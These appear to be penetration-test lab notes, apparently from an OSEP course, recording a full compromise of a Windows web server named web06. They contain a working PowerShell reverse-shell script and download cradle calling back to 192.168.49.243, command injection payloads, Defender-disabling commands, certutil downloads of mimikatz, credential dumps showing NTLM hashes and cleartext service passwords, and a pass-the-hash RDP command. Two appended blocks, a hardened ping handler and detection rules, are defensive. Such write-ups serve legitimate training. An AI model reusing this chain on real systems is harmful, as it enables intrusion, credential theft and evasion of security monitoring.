Note:
The current release version is 0.4.5.1 which is available on port **8080 from both final.com and dev.final.com**
The current insider version is 0.4.7.2 which is available on port **8081 from dev.final.com only**
After configuring a global proxy, http://172.16.243.194:8081/ can be opened directly in Firefox.
Try command injection: 127.0.0.1 && whoami
Inject again: 127.0.0.1 && ipconfig
This confirms the host is Windows; next, upload and run a PowerShell reverse shell (reference: https://www.revshells.com/):
$TCPClient = New-Object Net.Sockets.TCPClient('192.168.49.243', 443);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()
Inject again: 127.0.0.1 && powershell -exec bypass IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.49.243/rev.ps1'))
Reverse shell received:
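As an added example (not code from these notes or from the target application), a hypothetical "ping a host" handler in Python, showing the string-built command that the `&& whoami` payload above breaks out of beside a hardened version that allow-lists the host and never goes through a shell:

```python
import ipaddress
import os
import subprocess

# Constructed illustration, not the lab application's code: a "ping a host"
# feature of the kind the injection above abuses with "127.0.0.1 && whoami".
COUNT_FLAG = "-n" if os.name == "nt" else "-c"   # Windows vs POSIX ping


def vulnerable_command(host: str) -> str:
    # Unsafe: user input is spliced into a command line that is later handed
    # to a shell, so "&&" ends the ping and starts a second command.
    return f"ping {COUNT_FLAG} 1 {host}"


def is_valid_host(host: str) -> bool:
    """Allow-list check: an IP literal or an RFC 1123 hostname, nothing else."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    if not host or len(host) > 253:
        return False
    for label in host.split("."):
        if not label or len(label) > 63 or label[0] == "-" or label[-1] == "-":
            return False
        if not (label.isascii() and label.replace("-", "").isalnum()):
            return False
    return True


def safe_argv(host: str) -> list:
    # Hardened: the validated value travels as a single argv element, no shell.
    if not is_valid_host(host):
        raise ValueError(f"rejected host argument: {host!r}")
    return ["ping", COUNT_FLAG, "1", host]


def run_ping(host: str) -> str:
    # shell=False means metacharacters such as && are never interpreted.
    proc = subprocess.run(safe_argv(host), capture_output=True, text=True, timeout=10)
    return proc.stdout
```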
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.49.243] from (UNKNOWN) [192.168.243.189] 62982
SHELL> whoami
dev\apachesvc
SHELL> hostname
web06
SHELL> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
DEV\Domain Admins
DEV\SQLAdmin
DEV\WebAdmin
setup
The command completed successfully.
SHELL> net user dev\apachesvc
SHELL> net user apachesvc
SHELL> cd c:\Users\Administrator\Desktop
SHELL> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/2/2020 12:46 PM 32 proof.txt
SHELL> more proof.txt
150a6e6452dbe96b8262243842b23911
SHELL> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.243.194
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.243.254
SHELL> Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose
SHELL> IWR http://192.168.49.243:443/revshell.exe -OutFile revshell.exe
SHELL> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/2/2020 12:46 PM 32 proof.txt
-a---- 8/4/2022 12:47 AM 5632 revshell.exe
SHELL> revshell.exe
Invoke-Expression : The term 'revshell.exe' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:513
+ ... BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-S ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (revshell.exe:String) [Invoke-Expression], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException,Microsoft.PowerShell.Commands.InvokeExpressionCommand
SHELL> .\revshell.exe
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.243] from (UNKNOWN) [192.168.243.189] 63586
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\Desktop>
C:\Users\Administrator\Desktop>certutil.exe -urlcache -f http://192.168.49.243/mimikatz.exe mimikatz.exe
certutil.exe -urlcache -f http://192.168.49.243/mimikatz.exe mimikatz.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\Users\Administrator\Desktop>**mimikatz.exe "sekurlsa::logonPasswords" "exit"**
mimikatz.exe "sekurlsa::logonPasswords" "exit"
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # sekurlsa::logonPasswords
Authentication Id : 0 ; 573794 (00000000:0008c162)
Session : Service from 0
User Name : sqlsvc01
Domain : DEV
Logon Server : DC02
Logon Time : 8/4/2022 12:00:38 AM
SID : S-1-5-21-3097757723-3922880870-3169422460-1108
msv :
[00000003] Primary
* Username : sqlsvc01
* Domain : DEV
* NTLM : 077a55c458dc4002dfdc5321a7659526
* SHA1 : 8094dd9dcd751be1081dded062d5e0153daf8836
* DPAPI : b713b3e0fc6eb8e37cadd2d5eda8daea
tspkg :
wdigest :
* Username : sqlsvc01
* Domain : DEV
* Password : (null)
kerberos :
* Username : sqlsvc01
* Domain : DEV.FINAL.COM
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 399206 (00000000:00061766)
Session : Interactive from 0
User Name : setup
Domain : WEB06
Logon Server : WEB06
Logon Time : 8/3/2022 11:59:36 PM
SID : S-1-5-21-3244638768-2436265245-2643559287-1001
msv :
[00000003] Primary
* Username : setup
* Domain : WEB06
* NTLM : 42efdb0f0c884f32d51c2d785ea2d174
* SHA1 : f76679836170e221fe696e1deec2b5aa83e18d38
tspkg :
wdigest :
* Username : setup
* Domain : WEB06
* Password : (null)
kerberos :
* Username : setup
* Domain : WEB06
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 311258 (00000000:0004bfda)
Session : Interactive from 0
User Name : setup
Domain : WEB06
Logon Server : WEB06
Logon Time : 6/19/2022 5:25:46 PM
SID : S-1-5-21-3244638768-2436265245-2643559287-1001
msv :
[00000003] Primary
* Username : setup
* Domain : WEB06
* NTLM : 42efdb0f0c884f32d51c2d785ea2d174
* SHA1 : f76679836170e221fe696e1deec2b5aa83e18d38
tspkg :
wdigest :
* Username : setup
* Domain : WEB06
* Password : (null)
kerberos :
* Username : setup
* Domain : WEB06
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 123703 (00000000:0001e337)
Session : Service from 0
User Name : SQLTELEMETRY$SQLEXPRESS
Domain : NT Service
Logon Server : (null)
Logon Time : 6/19/2022 5:23:29 PM
SID : S-1-5-80-1985561900-798682989-2213159822-1904180398-3434236965
msv :
[00000003] Primary
* Username : WEB06$
* Domain : DEV
* NTLM : ab68c48d38eff8cf6bd67988e90e1b2b
* SHA1 : 82f00ce1116c7570a9546f6aa5357c33124a2a02
tspkg :
wdigest :
* Username : WEB06$
* Domain : DEV
* Password : (null)
kerberos :
* Username : WEB06$
* Domain : dev.final.com
* Password : (hex dump omitted)
ssp :
credman :
Authentication Id : 0 ; 70621 (00000000:000113dd)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 6/19/2022 5:23:27 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WEB06$
* Domain : DEV
* NTLM : ab68c48d38eff8cf6bd67988e90e1b2b
* SHA1 : 82f00ce1116c7570a9546f6aa5357c33124a2a02
tspkg :
wdigest :
* Username : WEB06$
* Domain : DEV
* Password : (null)
kerberos :
* Username : WEB06$
* Domain : dev.final.com
* Password : (hex dump omitted)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WEB06$
Domain : DEV
Logon Server : (null)
Logon Time : 6/19/2022 5:23:26 PM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WEB06$
* Domain : DEV
* NTLM : ab68c48d38eff8cf6bd67988e90e1b2b
* SHA1 : 82f00ce1116c7570a9546f6aa5357c33124a2a02
tspkg :
wdigest :
* Username : WEB06$
* Domain : DEV
* Password : (null)
kerberos :
* Username : web06$
* Domain : DEV.FINAL.COM
* Password : (hex dump omitted)
ssp :
credman :
Authentication Id : 0 ; 40997 (00000000:0000a025)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 6/19/2022 5:23:26 PM
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : WEB06$
* Domain : DEV
* NTLM : ab68c48d38eff8cf6bd67988e90e1b2b
* SHA1 : 82f00ce1116c7570a9546f6aa5357c33124a2a02
tspkg :
wdigest :
* Username : WEB06$
* Domain : DEV
* Password : (null)
kerberos :
* Username : WEB06$
* Domain : dev.final.com
* Password : (hex dump omitted)
ssp :
credman :
Authentication Id : 0 ; 39704 (00000000:00009b18)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 6/19/2022 5:23:26 PM
SID :
msv :
[00000003] Primary
* Username : WEB06$
* Domain : DEV
* NTLM : ab68c48d38eff8cf6bd67988e90e1b2b
* SHA1 : 82f00ce1116c7570a9546f6aa5357c33124a2a02
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 534240 (00000000:000826e0)
Session : Service from 0
User Name : apacheSvc
Domain : DEV
Logon Server : DC02
Logon Time : 8/4/2022 12:00:36 AM
SID : S-1-5-21-3097757723-3922880870-3169422460-1109
msv :
[00000003] Primary
* Username : apacheSvc
* Domain : DEV
* NTLM : a6a5f008019060ab8079feca697f9f73
* SHA1 : e957ac189a18afeaa3719d633bb817c14d132336
* DPAPI : 9ac5d1d435e5c7fd520505b52faa487b
tspkg :
wdigest :
* Username : apacheSvc
* Domain : DEV
* Password : (null)
kerberos :
* Username : apacheSvc
* Domain : DEV.FINAL.COM
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 6/19/2022 5:23:27 PM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 41098 (00000000:0000a08a)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 6/19/2022 5:23:26 PM
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : WEB06$
* Domain : DEV
* NTLM : ab68c48d38eff8cf6bd67988e90e1b2b
* SHA1 : 82f00ce1116c7570a9546f6aa5357c33124a2a02
tspkg :
wdigest :
* Username : WEB06$
* Domain : DEV
* Password : (null)
kerberos :
* Username : WEB06$
* Domain : dev.final.com
* Password : (hex dump omitted)
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WEB06$
Domain : DEV
Logon Server : (null)
Logon Time : 6/19/2022 5:23:26 PM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WEB06$
* Domain : DEV
* Password : (null)
kerberos :
* Username : web06$
* Domain : DEV.FINAL.COM
* Password : (hex dump omitted)
ssp :
credman :
mimikatz(commandline) # exit
Bye!
**C:\Users\Administrator\Desktop>mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"**
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
500 {0;000003e7} 1 D 35014 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000826e0} 0 D 2101924 DEV\apacheSvc S-1-5-21-3097757723-3922880870-3169422460-1109 (13g,24p) Primary
* Thread Token : {0;000003e7} 1 D 2129276 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # lsadump::secrets
Domain : WEB06
SysKey : 485476db53e09f6acf163790d111434a
Local name : WEB06 ( S-1-5-21-3244638768-2436265245-2643559287 )
Domain name : DEV ( S-1-5-21-3097757723-3922880870-3169422460 )
Domain FQDN : dev.final.com
Policy subsystem is : 1.18
LSA Key(s) : 1, default {67749853-7ea1-c0c4-fcb6-c0d8ba6d233f}
[00] {67749853-7ea1-c0c4-fcb6-c0d8ba6d233f} 769820fc025df5105f42b88eb83c726ec0f464d76c12030025ee76dcc99edef2
Secret : $MACHINE.ACC
cur/hex : (hex dump omitted)
NTLM:ab68c48d38eff8cf6bd67988e90e1b2b
SHA1:82f00ce1116c7570a9546f6aa5357c33124a2a02
old/hex : (hex dump omitted)
NTLM:21fee78e369bc6ade5f55592dd444270
SHA1:73ad2b1adb583dcb4539102c2e0a3bca0bd28ea1
Secret : DefaultPassword
Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 61 c8 fa 44 cf c2 83 d3 1c 75 86 59 57 c4 38 51 c2 36 30 70 79 15 55 80 8e a4 d3 b2 4d 81 98 6e d7 2a 2d 2b 09 5b 25 d3
full: 61c8fa44cfc283d31c75865957c43851c2363070791555808ea4d3b24d81986ed72a2d2b095b25d3
m/u : 61c8fa44cfc283d31c75865957c43851c2363070 / 791555808ea4d3b24d81986ed72a2d2b095b25d3
old/hex : 01 00 00 00 5e db 85 7e 78 5f 10 47 49 eb 19 93 31 48 36 b4 bc df 62 7d 33 59 f6 e1 27 79 91 f3 14 63 10 52 e7 9f 07 c6 ee 7d 6e 9f
full: 5edb857e785f104749eb1993314836b4bcdf627d3359f6e1277991f314631052e79f07c6ee7d6e9f
m/u : 5edb857e785f104749eb1993314836b4bcdf627d / 3359f6e1277991f314631052e79f07c6ee7d6e9f
Secret : NL$KM
cur/hex : a8 f9 a5 0c 77 0d 3e f3 43 1d 4c 0b cf fd ac 3b a3 fa 6c 53 28 23 3e 21 9d 44 c3 ee 85 fc fc cc 70 fb 59 ec 7e 60 c4 10 b6 93 a0 34 51 54 1f 35 76 ab 4f 88 70 de fa 24 30 89 dd ab 11 aa 94 98
old/hex : a8 f9 a5 0c 77 0d 3e f3 43 1d 4c 0b cf fd ac 3b a3 fa 6c 53 28 23 3e 21 9d 44 c3 ee 85 fc fc cc 70 fb 59 ec 7e 60 c4 10 b6 93 a0 34 51 54 1f 35 76 ab 4f 88 70 de fa 24 30 89 dd ab 11 aa 94 98
**Secret : _SC_Apache2.4 / service 'Apache2.4' with username : [email protected]
cur/text: fgodSDOJFSdjk53df
Secret : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username : [email protected]
cur/text: FDksld894rkjlsdfg**
Secret : _SC_SQLTELEMETRY$SQLEXPRESS / service 'SQLTELEMETRY$SQLEXPRESS' with username : NT Service\SQLTELEMETRY$SQLEXPRESS
mimikatz(commandline) # exit
Bye!
C:\Users\Administrator\Desktop>**mimikatz.exe "privilege::debug" "token::elevate" "lsadump::lsa /patch" "exit"**
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::lsa /patch" "exit"
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
500 {0;000003e7} 1 D 35014 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000826e0} 0 D 2131516 DEV\apacheSvc S-1-5-21-3097757723-3922880870-3169422460-1109 (13g,24p) Primary
* Thread Token : {0;000003e7} 1 D 2158780 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # lsadump::lsa /patch
Domain : WEB06 / S-1-5-21-3244638768-2436265245-2643559287
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : **f99529e42ee77dc4704c568ba9320a34**
RID : 000001f7 (503)
User : DefaultAccount
LM :
NTLM :
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000003e9 (1001)
User : setup
LM :
NTLM : 42efdb0f0c884f32d51c2d785ea2d174
RID : 000001f8 (504)
User : WDAGUtilityAccount
LM :
NTLM : 1e47acda1887221f618e196e33f3e14d
mimikatz(commandline) # exit
Bye!
**C:\Users\Administrator\Desktop>certutil.exe -urlcache -f http://192.168.49.243/PowerUpSQL.ps1 PowerUpSQL.ps1**
certutil.exe -urlcache -f http://192.168.49.243/PowerUpSQL.ps1 PowerUpSQL.ps1
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\Users\Administrator\Desktop>powershell -exec bypass
powershell -exec bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\Administrator\Desktop> **Import-Module .\PowerUpSQL.ps1**
Import-Module .\PowerUpSQL.ps1
PS C:\Users\Administrator\Desktop> **Get-SQLInstanceLocal -Verbose**
Get-SQLInstanceLocal -Verbose
ComputerName : WEB06
Instance : WEB06\SQLEXPRESS
ServiceDisplayName : SQL Server (SQLEXPRESS)
ServiceName : MSSQL$SQLEXPRESS
ServicePath : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
ServiceAccount : [email protected]
State : Running
PS C:\Users\Administrator\Desktop> **Get-SQLInstanceDomain -Verbose**
Get-SQLInstanceDomain -Verbose
VERBOSE: Grabbing SPNs from the domain for SQL Servers (MSSQL*)...
VERBOSE: Parsing SQL Server instances from SPNs...
VERBOSE: 1 instances were found.
ComputerName : web06.dev.final.com
Instance : web06.dev.final.com,1433
DomainAccountSid : 150000052100027816418410210521023312414023318884400
DomainAccount : sqlsvc01
DomainAccountCn : sqlsvc01
Service : MSSQLSvc
Spn : MSSQLSvc/web06.dev.final.com:1433
LastLogon : 8/4/2022 12:00 AM
Description :
PS C:\Users\Administrator\Desktop> **Get-SQLServerInfo -Verbose -Instance WEB06**
Get-SQLServerInfo -Verbose -Instance WEB06
VERBOSE: WEB06 : Connection Success.
ComputerName : WEB06
Instance : WEB06\SQLEXPRESS
DomainName : DEV
ServiceProcessID : 4392
ServiceName : MSSQL$SQLEXPRESS
ServiceAccount : [email protected]
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Express Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : DEV\apacheSvc
IsSysadmin : No
ActiveSessions : 1
Allow pass-the-hash over RDP (Restricted Admin mode):
PS C:\Users\Administrator\Desktop> **New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force**
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
DisableRestrictedAdmin : 0
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control
PSChildName : Lsa
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
Connect on 3389: proxychains4 xfreerdp /v:172.16.243.194 /u:administrator /pth:f99529e42ee77dc4704c568ba9320a34 +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore
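Added example, not part of the original notes: detection logic in Python run over constructed Sysmon-style events that mirror each stage of the chain above (the web server spawning a shell, the PowerShell download cradle, Set-MpPreference tampering, the certutil download, mimikatz module syntax, and DisableRestrictedAdmin set to 0). The log format, file paths and rule names are assumptions, not artefacts from the lab.

```python
import re

# Constructed Sysmon-style events (EventID 1 = process create, 13 = registry
# value set) that mirror the steps of this write-up; they are not real logs
# from the lab, and the paths are placeholders. Last line is benign.
SAMPLE_LOG = r"""
EventID=1 ParentImage="C:\Apache24\bin\httpd.exe" Image="C:\Windows\System32\cmd.exe" CommandLine="cmd.exe /c ping 127.0.0.1 && whoami"
EventID=1 ParentImage="C:\Windows\System32\cmd.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell -exec bypass IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.49.243/rev.ps1'))"
EventID=1 ParentImage="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="Set-MpPreference -DisableIOAVProtection $true -DisableRealtimeMonitoring $true"
EventID=1 ParentImage="C:\Windows\System32\cmd.exe" Image="C:\Windows\System32\certutil.exe" CommandLine="certutil.exe -urlcache -f http://192.168.49.243/mimikatz.exe mimikatz.exe"
EventID=1 ParentImage="C:\Windows\System32\cmd.exe" Image="C:\Users\Administrator\Desktop\mimikatz.exe" CommandLine="mimikatz.exe 'privilege::debug' 'token::elevate' 'lsadump::secrets' 'exit'"
EventID=13 Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" TargetObject="HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin" Details="DWORD (0x00000000)"
EventID=1 ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell Get-Process"
""".strip().splitlines()

# key=value pairs; quoted values may contain spaces
FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> dict:
    return {k: quoted or bare for k, quoted, bare in FIELD.findall(line)}


def _cmd(e: dict) -> str:
    return e.get("CommandLine", "")


def _image_is(e: dict, key: str, *names: str) -> bool:
    # compare only the file name of the image path
    return e.get(key, "").lower().rsplit("\\", 1)[-1] in names


# Each rule is keyed to one stage of the chain described in the notes above.
RULES = {
    "web_server_spawned_shell": lambda e: e.get("EventID") == "1"
        and _image_is(e, "ParentImage", "httpd.exe", "w3wp.exe")
        and _image_is(e, "Image", "cmd.exe", "powershell.exe"),
    "powershell_download_cradle": lambda e: re.search(
        r"-exec\s+bypass.*(IEX|Invoke-Expression).*DownloadString", _cmd(e), re.I),
    "defender_realtime_disabled": lambda e: re.search(
        r"Set-MpPreference.*-Disable(RealtimeMonitoring|IOAVProtection|IntrusionPreventionSystem)",
        _cmd(e), re.I),
    "certutil_urlcache_download": lambda e: re.search(
        r"certutil(\.exe)?\s+-urlcache\s+-f\s+https?://", _cmd(e), re.I),
    "mimikatz_module_syntax": lambda e: re.search(
        r"(sekurlsa|lsadump|privilege|token)::", _cmd(e), re.I),
    "restricted_admin_enabled": lambda e: e.get("EventID") == "13"
        and e.get("TargetObject", "").lower().endswith(r"\lsa\disablerestrictedadmin")
        and "0x00000000" in e.get("Details", ""),
}


def detect(lines) -> list:
    """Return (line_number, rule_name) for every rule each event trips."""
    hits = []
    for n, line in enumerate(lines, 1):
        ev = parse_event(line)
        hits.extend((n, name) for name, rule in RULES.items() if rule(ev))
    return hits


if __name__ == "__main__":
    for n, name in detect(SAMPLE_LOG):
        print(f"line {n}: {name}")
```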